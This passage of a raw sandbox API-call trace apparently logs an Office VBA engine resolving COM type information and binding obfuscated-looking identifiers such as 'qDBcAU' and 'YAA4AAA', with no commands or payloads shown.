returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xea, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xeb, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xec, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.343] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xed, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.343] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xee, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xef, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf0, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf1, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf2, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf3, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf4, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf5, ppFuncDesc=0x145ba8, pDummy=0x90 | out: ppFuncDesc=0x145ba8, pDummy=0x90) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf6, ppFuncDesc=0x145ba8, pDummy=0x460 | out: ppFuncDesc=0x145ba8, pDummy=0x460) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf7, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo:RemoteGetFuncDesc (in: This=0x695c970, index=0xf8, ppFuncDesc=0x145ba8, pDummy=0x70 | out: ppFuncDesc=0x145ba8, pDummy=0x70) returned 0x0 [0068.344] ITypeInfo:LocalReleaseFuncDesc (This=0x695c970) returned 0x0 [0068.344] ITypeInfo2:GetCustData (in: This=0x695c8c0, GUID=0x7fee3b2d970*(Data1=0xba65d790, Data2=0x9301, Data3=0x11cf, Data4=([0]=0x8d, [1]=0x22, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x37, [6]=0x53, [7]=0x84)), pVarVal=0x145bd8 | out: pVarVal=0x145bd8*(varType=0x0, wReserved1=0x0, wReserved2=0x1b8, wReserved3=0x0, varVal1=0x0, varVal2=0x800000000)) returned 0x0 [0068.344] IUnknown:Release (This=0x695c8c0) returned 0x2 [0068.344] ITypeInfo:RemoteGetDocumentation (in: This=0x695c8c0, memid=-1, refPtrFlags=0x145bd0, pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0 | out: pbstrName=0x0, pBstrDocString=0x0, pdwHelpContext=0x0, pBstrHelpFile=0x0) returned 0x0 [0068.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Document", cchWideChar=9, lpMultiByteStr=0x145ae0, cbMultiByte=18, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Document", lpUsedDefaultChar=0x0) returned 9 [0068.344] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="Document") returned 0x10d36a [0068.344] IUnknown:AddRef (This=0x695ca20) returned 0x4 [0068.344] IUnknown:Release (This=0x695ca20) returned 0x3 [0068.344] IUnknown:Release (This=0x695c970) returned 0x1 [0068.344] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c8c0, ppTypeAttr=0x145ea8, pDummy=0xafd5310 | out: ppTypeAttr=0x145ea8, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.344] ITypeInfo:LocalReleaseTypeAttr (This=0x695c8c0) returned 0x0 [0068.344] IUnknown:Release (This=0x695c8c0) returned 0x1 [0068.344] CoCreateGuid (in: pguid=0x146060 | out: pguid=0x146060*(Data1=0xaeac1c24, Data2=0xdd4f, Data3=0x460c, Data4=([0]=0xb4, [1]=0xa5, [2]=0xb1, [3]=0xfe, [4]=0xd9, [5]=0x43, [6]=0x2f, [7]=0x13))) returned 0x0 [0068.345] CoCreateGuid (in: pguid=0x146060 | out: pguid=0x146060*(Data1=0x82f65bbe, Data2=0x99cb, Data3=0x44dc, Data4=([0]=0x96, [1]=0x4d, [2]=0x9c, [3]=0xa0, [4]=0xf3, [5]=0x7c, [6]=0xce, [7]=0x7b))) returned 0x0 [0068.345] IMalloc:Alloc (This=0x7fefec05380, cb=0x14) returned 0x67c2ce0 [0068.345] IMalloc:Alloc (This=0x7fefec05380, cb=0xc0) returned 0x397620 [0068.345] IMalloc:GetSize (This=0x7fefec05380, pv=0x397620) returned 0xc0 [0068.349] ITypeInfo:RemoteGetTypeAttr (in: This=0x695c970, ppTypeAttr=0x1462f0, pDummy=0xafd5310 | out: ppTypeAttr=0x1462f0, pDummy=0xafd5310*=0x3a710007) returned 0x0 [0068.349] ITypeInfo:LocalReleaseTypeAttr (This=0x695c970) returned 0x0 [0068.349] ITypeInfo:GetRefTypeOfImplType (in: This=0x695c970, index=0x0, pRefType=0x1462e8 | out: pRefType=0x1462e8*=0x3) returned 0x0 [0068.349] ITypeInfo:GetRefTypeInfo (in: This=0x695c970, hreftype=0x3, ppTInfo=0x1462f8 | out: ppTInfo=0x1462f8*=0xaf13168) returned 0x0 [0068.349] IUnknown:Release (This=0x695c970) returned 0x1 [0068.349] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf13168, ppTypeAttr=0x1462f0, pDummy=0x1462c8 | out: ppTypeAttr=0x1462f0, pDummy=0x1462c8*=0x3) returned 0x0 [0068.349] ITypeInfo:LocalReleaseTypeAttr (This=0xaf13168) returned 0x0 [0068.349] ITypeInfo:GetRefTypeOfImplType (in: This=0xaf13168, index=0x0, pRefType=0x1462e8 | out: pRefType=0x1462e8*=0x182) returned 0x0 [0068.349] ITypeInfo:GetRefTypeInfo (in: This=0xaf13168, hreftype=0x182, ppTInfo=0x1462f8 | out: ppTInfo=0x1462f8*=0xaf131c0) returned 0x0 [0068.349] IUnknown:Release (This=0xaf13168) returned 0x1 [0068.349] ITypeInfo:RemoteGetTypeAttr (in: This=0xaf131c0, ppTypeAttr=0x1462f0, pDummy=0x1462d0 | out: ppTypeAttr=0x1462f0, pDummy=0x1462d0*=0x146300) returned 0x0 [0068.349] ITypeInfo:LocalReleaseTypeAttr (This=0xaf131c0) returned 0x0 [0068.349] IUnknown:Release (This=0xaf131c0) returned 0x1 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x7, _Src=0x34d2b5a | out: _Dst=0x145d10) returned 0x0 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x8, _Src=0x3a60a5a | out: _Dst=0x145d10) returned 0x0 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x7, _Src=0x3b80fea | out: _Dst=0x145d10) returned 0x0 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x7, _Src=0x3b91732 | out: _Dst=0x145d10) returned 0x0 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x7, _Src=0x3ba04f2 | out: _Dst=0x145d10) returned 0x0 [0068.349] _mbscpy_s (in: _Dst=0x145d10, _DstSizeInBytes=0x9, _Src=0x3ba08ce | out: _Dst=0x145d10) returned 0x0 [0068.349] IMalloc:Realloc (This=0x7fefec05380, pv=0x0, cb=0x30) returned 0x646f7f0 [0068.350] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x42d0000 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf61150 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0xb8) returned 0xaf03290 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x3d0) returned 0x3f54820 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e7c0 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2c80 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf614b0 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0x6a598b0 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0xafb7b10 [0068.351] IUnknown:AddRef (This=0x665ba50) returned 0x5 [0068.351] IUnknown:QueryInterface (in: This=0x665ba50, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.351] ITypeLib:GetTypeComp (in: This=0x665ba50, ppTComp=0x144f08 | out: ppTComp=0x144f08*=0x665ba60) returned 0x0 [0068.351] IMalloc:Alloc (This=0x7fefec05380, cb=0x38) returned 0x646fcb0 [0068.351] IUnknown:AddRef (This=0x665ba60) returned 0x7 [0068.351] IUnknown:Release (This=0x665ba60) returned 0x6 [0068.351] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.351] IUnknown:AddRef (This=0x631b4c0) returned 0xb [0068.351] IUnknown:QueryInterface (in: This=0x631b4c0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.351] ITypeLib:GetTypeComp (in: This=0x631b4c0, ppTComp=0x144f08 | out: ppTComp=0x144f08*=0x631b4d0) returned 0x0 [0068.352] IMalloc:Alloc (This=0x7fefec05380, cb=0x38) returned 0x646fb30 [0068.352] IUnknown:AddRef (This=0x631b4d0) returned 0xd [0068.352] IUnknown:Release (This=0x631b4d0) returned 0xc [0068.352] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.352] IUnknown:AddRef (This=0x665bd20) returned 0x6 [0068.352] IUnknown:QueryInterface (in: This=0x665bd20, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.352] ITypeLib:GetTypeComp (in: This=0x665bd20, ppTComp=0x144f08 | out: ppTComp=0x144f08*=0x665bd30) returned 0x0 [0068.352] IMalloc:Alloc (This=0x7fefec05380, cb=0x38) returned 0x646f8f0 [0068.352] IUnknown:AddRef (This=0x665bd30) returned 0x8 [0068.352] IUnknown:Release (This=0x665bd30) returned 0x7 [0068.352] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.352] wcscpy_s (in: _Destination=0x6884528, _SizeInWords=0xa, _Source="*\\CNormal" | out: _Destination="*\\CNormal") returned 0x0 [0068.352] wcsncpy_s (in: _Destination=0x144af0, _SizeInWords=0x108, _Source="*\\CNormal", _MaxCount=0x106 | out: _Destination="*\\CNormal") returned 0x0 [0068.352] CharLowerBuffW (in: lpsz="*\\CNormal", cchLength=0x9 | out: lpsz="*\\cnormal") returned 0x9 [0068.352] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="*\\cnormal", cchWideChar=10, lpMultiByteStr=0x144a20, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="*\\cnormal", lpUsedDefaultChar=0x0) returned 10 [0068.352] _wcsicmp (_String1="*\\CNormal", _String2="*\\CNormal") returned 0 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x40) returned 0x68e3a00 [0068.353] IUnknown:AddRef (This=0x665b4b0) returned 0x4 [0068.353] IUnknown:QueryInterface (in: This=0x665b4b0, riid=0x7fee3b25c68*(Data1=0xcacc1e84, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f10 | out: ppvObject=0x144f10*=0x0) returned 0x80004002 [0068.353] ITypeLib:GetTypeComp (in: This=0x665b4b0, ppTComp=0x144f08 | out: ppTComp=0x144f08*=0x665b4c0) returned 0x0 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x38) returned 0x646fc30 [0068.353] IUnknown:AddRef (This=0x665b4c0) returned 0x6 [0068.353] IUnknown:Release (This=0x665b4c0) returned 0x5 [0068.353] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba223e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="qDBcAU") returned 7 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x640) returned 0xafb9a70 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682ea30 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0xafb7b20 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x0) returned 0xafb7b30 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x20) returned 0x682e7f0 [0068.353] IMalloc:Alloc (This=0x7fefec05380, cb=0x80) returned 0xaf61420 [0068.353] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qDBcAU", lHashVal=0x10479f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba223e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="qDBcAU") returned 7 [0068.353] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qDBcAU", lHashVal=0x10479f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.353] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba223e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="qDBcAU") returned 7 [0068.354] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qDBcAU", lHashVal=0x10479f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.387] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qDBcAU") returned 0x10479f [0068.387] strcpy_s (in: _Dst=0x144e00, _DstSize=0x7, _Src="qDBcAU" | out: _Dst="qDBcAU") returned 0x0 [0068.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=7, lpWideCharStr=0x144c50, cchWideChar=7 | out: lpWideCharStr="qDBcAU") returned 7 [0068.387] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.387] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qDBcAU", lHashVal=0x10479f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.387] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.387] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.387] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qDBcAU", lHashVal=0x10479f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.387] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.387] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.387] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qDBcAU", lHashVal=0x10479f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.387] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.387] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.387] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qDBcAU", lHashVal=0x10479f, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.387] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.387] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba223e, cbMultiByte=7, lpWideCharStr=0x144ea0, cchWideChar=8 | out: lpWideCharStr="qDBcAU") returned 7 [0068.387] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qDBcAU", lHashVal=0x10479f, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.387] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d60 [0068.387] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x7, _Src=0x3ba223e | out: _Dst=0x67c2d60) returned 0x0 [0068.387] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qDBcAU") returned 0x10c248 [0068.387] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="aQZGUok1", cchCount1=-1, lpString2="_B_var_qDBcAU", cchCount2=-1) returned 3 [0068.388] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xe, _Src="_B_var_qDBcAU" | out: _Dst="_B_var_qDBcAU") returned 0x0 [0068.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=14, lpWideCharStr=0x144e00, cchWideChar=14 | out: lpWideCharStr="_B_var_qDBcAU") returned 14 [0068.388] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.388] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qDBcAU", lHashVal=0x10c248, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.388] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.388] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.388] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qDBcAU", lHashVal=0x10c248, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.388] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.388] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.388] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qDBcAU", lHashVal=0x10c248, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.388] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.388] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.388] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qDBcAU", lHashVal=0x10c248, pfName=0x144ed0, pBstrLibName=0x144e00 | out: pfName=0x144ed0*=0, pBstrLibName=0x144e00) returned 0x0 [0068.388] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.388] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.388] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.388] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3cc1582, cbMultiByte=14, lpWideCharStr=0x144e60, cchWideChar=15 | out: lpWideCharStr="_B_var_qDBcAU") returned 14 [0068.388] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qDBcAU", lHashVal=0x10c248, wFlags=0x3, ppTInfo=0x144e18, pDescKind=0x144e2c, ppFuncDesc=0x144e30, ppVarDesc=0x71005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0 | out: ppTInfo=0x144e18*=0x0, pDescKind=0x144e2c*=0, ppFuncDesc=0x144e30, ppVarDesc=0x71005f00720061, ppTypeComp=0x41006300000000, pDummy=0x0) returned 0x0 [0068.388] IMalloc:Realloc (This=0x7fefec05380, pv=0x6a64820, cb=0x100) returned 0xaf543a0 [0068.388] _mbscpy_s (in: _Dst=0x145020, _DstSizeInBytes=0x7, _Src=0x3ba223e | out: _Dst=0x145020) returned 0x0 [0068.388] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d60) [0068.389] realloc (_Block=0x0, _Size=0x200) returned 0x251ced0 [0068.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2266, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="YAA4AAA") returned 8 [0068.389] ITypeComp:RemoteBind (in: This=0x665ba60, szName="YAA4AAA", lHashVal=0x10659c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2266, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="YAA4AAA") returned 8 [0068.389] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="YAA4AAA", lHashVal=0x10659c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2266, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="YAA4AAA") returned 8 [0068.389] ITypeComp:RemoteBind (in: This=0x665bd30, szName="YAA4AAA", lHashVal=0x10659c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.389] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="YAA4AAA") returned 0x10659c [0068.389] strcpy_s (in: _Dst=0x144e00, _DstSize=0x8, _Src="YAA4AAA" | out: _Dst="YAA4AAA") returned 0x0 [0068.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e00, cbMultiByte=8, lpWideCharStr=0x144c50, cchWideChar=8 | out: lpWideCharStr="YAA4AAA") returned 8 [0068.389] IUnknown:AddRef (This=0x665ba50) returned 0x6 [0068.389] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="YAA4AAA", lHashVal=0x10659c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.389] IUnknown:Release (This=0x665ba50) returned 0x5 [0068.389] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.389] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="YAA4AAA", lHashVal=0x10659c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.389] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.389] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.389] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="YAA4AAA", lHashVal=0x10659c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.389] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.389] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.389] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="YAA4AAA", lHashVal=0x10659c, pfName=0x144d20, pBstrLibName=0x144c50 | out: pfName=0x144d20*=0, pBstrLibName=0x144c50) returned 0x0 [0068.389] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.389] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3ba2266, cbMultiByte=8, lpWideCharStr=0x144ea0, cchWideChar=9 | out: lpWideCharStr="YAA4AAA") returned 8 [0068.389] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="YAA4AAA", lHashVal=0x10659c, wFlags=0x3, ppTInfo=0x144e58, pDescKind=0x144e6c, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144e58*=0x0, pDescKind=0x144e6c*=0, ppFuncDesc=0x144e70, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.389] IMalloc:Realloc (This=0x7fefec05380, pv=0xaf543a0, cb=0x200) returned 0xaf17100 [0068.389] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d60 [0068.389] _mbscpy_s (in: _Dst=0x67c2d60, _DstSizeInBytes=0x8, _Src=0x3ba2266 | out: _Dst=0x67c2d60) returned 0x0 [0068.390] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_YAA4AAA") returned 0x10599f [0068.390] strcpy_s (in: _Dst=0x144fb0, _DstSize=0xf, _Src="_B_var_YAA4AAA" | out: _Dst="_B_var_YAA4AAA") returned 0x0 [0068.390] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144fb0, cbMultiByte=15, lpWideCharStr=0x144e00, cchWideChar=15 